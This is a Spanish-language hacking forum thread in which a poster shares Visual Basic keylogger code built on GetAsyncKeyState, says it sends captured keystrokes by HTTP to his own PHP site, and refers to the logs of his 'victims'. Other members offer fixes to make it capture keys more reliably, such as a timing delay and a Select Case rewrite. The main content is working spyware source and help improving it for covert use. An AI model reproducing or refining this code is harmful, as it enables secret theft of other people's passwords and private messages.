elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Keylogger vuelto lokoOo!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: Keylogger vuelto lokoOo!  (Leído 5,182 veces)
A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Keylogger vuelto lokoOo!
« en: 18 Septiembre 2005, 07:52 am »

hola... posteo pke tengo un gran problema... uno que ya me esta volviendo lokoOo!.

desde hace tiempo empeze un proyectillo para hacer un keylogger lo mas perfecto posible... despues de varias semanas, me doy por vencidoOo!.

El keylogger manda los logs via http a mi sitio php, pero algo okurre dentro del keylogger que los logs llegan mal!, llegan con palabras cortadas, algo asi:

Citar
knda

Donde kisieron decir "que Onda"
Jejeje.

Citar
en
dhuoe e madba ar
No se que kisieron decir! jajajaja...

mi keylogger no esta basado en Hooks, no los uso pke no los comprendo muy bien... y pke al mandar los logs por medio del iexplore no puedo meter simbolos  raros como "&" "/" "%" y otroOos por el estiloOo!
entonces uso
"GetAsyncKeyState"

y por ejemplo para llamar las teclas uso esto:
Código:
For i = Asc("A") To Asc("Z")
 If GetAsyncKeyState(i) = -32767 Then
 TypeWindow
  If GetAsyncKeyState(VK_SHIFT) < 0 Then
   If GetKeyState(VK_CAPITAL) > 0 Then
   Text1 = Text1 & LCase(Chr(i))
   Exit Sub
   Else
   Text1 = Text1 & UCase(Chr(i))
   Exit Sub
   End If
  Else
   If GetKeyState(VK_CAPITAL) > 0 Then
   Text1 = Text1 & UCase(Chr(i))
   Exit Sub
   Else
   Text1 = Text1 & LCase(Chr(i))
   Exit Sub
   End If
  End If
       
 End If
Next

For i = 48 To 57
 If GetAsyncKeyState(i) = -32767 Then
 TypeWindow
 
  If GetAsyncKeyState(VK_SHIFT) < 0 Then
  Text1 = Text1 & ChangeChr(i)
  Exit Sub
  Else
  Text1 = Text1 & Chr(i)
  Exit Sub
  End If
 
 End If
Next

For i = 186 To 192
 If GetAsyncKeyState(i) = -32767 Then
 TypeWindow
 
  If GetAsyncKeyState(VK_SHIFT) < 0 Then
  Text1 = Text1 & ChangeChr(i - 100)
  Exit Sub

  Else
  Text1 = Text1 & ChangeChr(i)
  Exit Sub
  End If
 
 End If
Next

For i = 219 To 222
 If GetAsyncKeyState(i) = -32767 Then
 TypeWindow
 
  If GetAsyncKeyState(VK_SHIFT) < 0 Then
  Text1 = Text1 & ChangeChr(i - 100)
  Exit Sub
  Else
  Text1 = Text1 & ChangeChr(i)
  Exit Sub
  End If
 
 End If
Next

For i = 96 To 111
 If GetAsyncKeyState(i) = -32767 Then
 TypeWindow
   
  Text1 = Text1 & ChangeChr(i)
  Exit Sub
 End If
Next
 
 If GetAsyncKeyState(8) = -32767 Then
 TypeWindow
 If (Right(Text1, 1) = " ") Then GoTo nod
 tip = Len(Text1) - 1
  Text1 = Left(Text1, tip)
nod:
 End If
 
 If GetAsyncKeyState(9) = -32767 Then
 TypeWindow
  Text1 = Text1 & "[Tab]"
 End If
 
 If GetAsyncKeyState(13) = -32767 Then
  Text1 = Text1 & "<br>"
 End If

 If GetAsyncKeyState(17) = -32767 Then
  Text1 = Text1 & "[Ctrl]"
 End If

  If GetAsyncKeyState(18) = -32767 Then
  Text1 = Text1 & "[Alt]"
 End If
 
  If GetAsyncKeyState(19) = -32767 Then
  Text1 = Text1 & "[Pausa]"
 End If
 
 If GetAsyncKeyState(20) = -32767 Then
  Text1 = Text1 & "[Mayús]"
 End If
 
 If GetAsyncKeyState(27) = -32767 Then
  Text1 = Text1 & "[Esc]"
 End If
 
 If GetAsyncKeyState(32) = -32767 Then
  Text1 = Text1 & " "
 End If
 
  If GetAsyncKeyState(37) = -32767 Then
  Text1 = Text1 & "[<-]"
 End If
 
 If GetAsyncKeyState(38) = -32767 Then
  Text1 = Text1 & "[Up]"
 End If
 
 If GetAsyncKeyState(39) = -32767 Then
  Text1 = Text1 & "[->]"
 End If
 
  If GetAsyncKeyState(40) = -32767 Then
  Text1 = Text1 & "[Down]"
 End If

 If GetAsyncKeyState(44) = -32767 Then
  Text1 = Text1 & "[Print]"
  End If
 
   If GetAsyncKeyState(91) = -32767 Then
  Text1 = Text1 & "[Win]"
 End If
 
 If GetAsyncKeyState(92) = -32767 Then
  Text1 = Text1 & "[Win]"
 End If
 
   If GetAsyncKeyState(93) = -32767 Then
  Text1 = Text1 & "[Pps]"
 End If
 
  If GetAsyncKeyState(112) = -32767 Then
  Text1 = Text1 & "[F1]"
  End If
 
  If GetAsyncKeyState(113) = -32767 Then
  Text1 = Text1 & "[F2]"
  End If
 
   If GetAsyncKeyState(114) = -32767 Then
  Text1 = Text1 & "[F3]"
  End If
 
   If GetAsyncKeyState(115) = -32767 Then
  Text1 = Text1 & "[F4]"
  End If
 
    If GetAsyncKeyState(116) = -32767 Then
  Text1 = Text1 & "[F5]"
  End If
 
    If GetAsyncKeyState(117) = -32767 Then
  Text1 = Text1 & "[F6]"
  End If
 
   If GetAsyncKeyState(118) = -32767 Then
  Text1 = Text1 & "[F7]"
  End If
 
    If GetAsyncKeyState(119) = -32767 Then
  Text1 = Text1 & "[F8]"
  End If
 
   If GetAsyncKeyState(120) = -32767 Then
  Text1 = Text1 & "[F9]"
  End If
 
   If GetAsyncKeyState(121) = -32767 Then
  Text1 = Text1 & "[F10]"
  End If
 
   If GetAsyncKeyState(122) = -32767 Then
  Text1 = Text1 & "[F11]"
  End If
   
  If GetAsyncKeyState(123) = -32767 Then
  Text1 = Text1 & "[F12]"
  End If
 
  If GetAsyncKeyState(145) = -32767 Then
  Text1 = Text1 & "[Desp]"
  End If
 
  If GetAsyncKeyState(144) = -32767 Then
  Text1 = Text1 & "[Num]"
  End If
 
 For i = 45 To 46
 If GetAsyncKeyState(i) = -32767 Then
 Text1 = Text1 & ChangeChr(i)
 End If
 Next
 
 For i = 33 To 36
 If GetAsyncKeyState(i) = -32767 Then
 Text1 = Text1 & ChangeChr(i)
 End If
 Next
 
End Sub

Mi teoria es que... al ser tanto kodigoOo el programa no tiene tiempo de revisar que tecla es, y en el intento de la buskeda se pierde de la tecla siguiente...
Estoy bien?
Existe algun metodo para hacer mas pekeño este kodigoOo?

o algun consejillo por ahi?

Gracias!
Espero su respuesta >.<


En línea

Hackeo, luego existo...
Slasher-K


Desconectado Desconectado

Mensajes: 1.477


Ver Perfil
Re: Keylogger vuelto lokoOo!
« Respuesta #1 en: 18 Septiembre 2005, 09:09 am »

Que espere un poco de tiempo (125 milisegundos) antes de cada interacción.

Saludos.


En línea



A la reina de las profundidades que cuida los pasos de una sombra en la noche :*
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Keylogger vuelto lokoOo!
« Respuesta #2 en: 18 Septiembre 2005, 14:04 pm »

De todas maneras en todos los keyloggers que he visto programados en VB siempre pasa lo mismo, te pones a escribir rápido y se come tantas letras que al final no comprendes que dice esa palabra.
En línea

A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: Keylogger vuelto lokoOo!
« Respuesta #3 en: 18 Septiembre 2005, 18:39 pm »

si me ha tokado ver lo que dice yeikos... Gracias como kiera polux, probare con el 125...

Tmb me he dado cuenta que se empieza a descomponer el log despues de abrir algun programa pesado...

Esto lo note en los logs de mis victimas, cuando abrian un juego.
....
que puedo hacer?
« Última modificación: 18 Septiembre 2005, 18:41 pm por Ado's_Xtreme » En línea

Hackeo, luego existo...
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Keylogger vuelto lokoOo!
« Respuesta #4 en: 18 Septiembre 2005, 21:02 pm »

La verdad es que VB no es el lenguaje idóneo para programar keyloggers, he visto por el foro de C keyloggers que funcionan a la perfección y su código es muy simple, echale un vistazo.
En línea

Kizar


Desconectado Desconectado

Mensajes: 1.325


kizar_net


Ver Perfil
Re: Keylogger vuelto lokoOo!
« Respuesta #5 en: 18 Septiembre 2005, 21:05 pm »

Ya, vb no es el lenguaje adecuado, de todas maneras puedes reducir a la mitad tu codigo con un selec case

Salu2
En línea

A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: Keylogger vuelto lokoOo!
« Respuesta #6 en: 18 Septiembre 2005, 21:40 pm »

oh... me interesa eso de reducir el kodigo al maximoOo!.

selec case dices???
Ok, buskare acerka de esoOo!.

Gracias!...
En línea

Hackeo, luego existo...
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Keylogger vuelto lokoOo!
« Respuesta #7 en: 18 Septiembre 2005, 21:57 pm »

Dim tecla as String
tecla = "3"
Select Case tecla
Case is "1"
msgbox "uno"
Case is "2"
msgbox "dos"
Case is "3"
msgbox "tres"
end select
« Última modificación: 19 Septiembre 2005, 00:12 am por YeIk0s » En línea

Kizar


Desconectado Desconectado

Mensajes: 1.325


kizar_net


Ver Perfil
Re: Keylogger vuelto lokoOo!
« Respuesta #8 en: 18 Septiembre 2005, 23:53 pm »

Código:
Dim tecla as String
tecla = "3"
Select Case tecla
Case is "1"
msgbox "uno"
Case is "2"
msgbox "dos"
Case is "3"
msgbox "tres"
end [color=Red]select [/color]

corregido  ;)

Salu2
En línea

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Keylogger vuelto lokoOo!
« Respuesta #9 en: 19 Septiembre 2005, 00:13 am »

Cierto  ;), es que en este ordenador no tengo el VB y como estoy acostumbrado a que me corrija si me equivoco  ::) .
En línea

Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines